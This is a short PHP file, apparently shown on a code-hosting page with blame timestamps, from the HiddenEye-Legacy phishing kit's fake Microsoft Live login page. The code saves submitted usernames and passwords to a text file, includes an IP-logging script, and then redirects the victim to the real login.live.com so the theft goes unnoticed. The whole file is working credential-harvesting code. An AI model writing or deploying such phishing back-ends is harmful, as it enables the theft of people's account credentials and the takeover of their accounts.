HiddenEye-Legacy/WebPages/live_web/login.php

7 lines
202 B
PHP
Raw Normal View History

2018-06-04 18:41:23 +08:00
<?php
2018-06-07 17:22:59 +08:00
include 'ip.php';
2018-06-04 18:41:23 +08:00
2018-06-04 18:52:07 +08:00
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
2018-06-04 18:41:23 +08:00
header('Location: http://login.live.com/');
exit();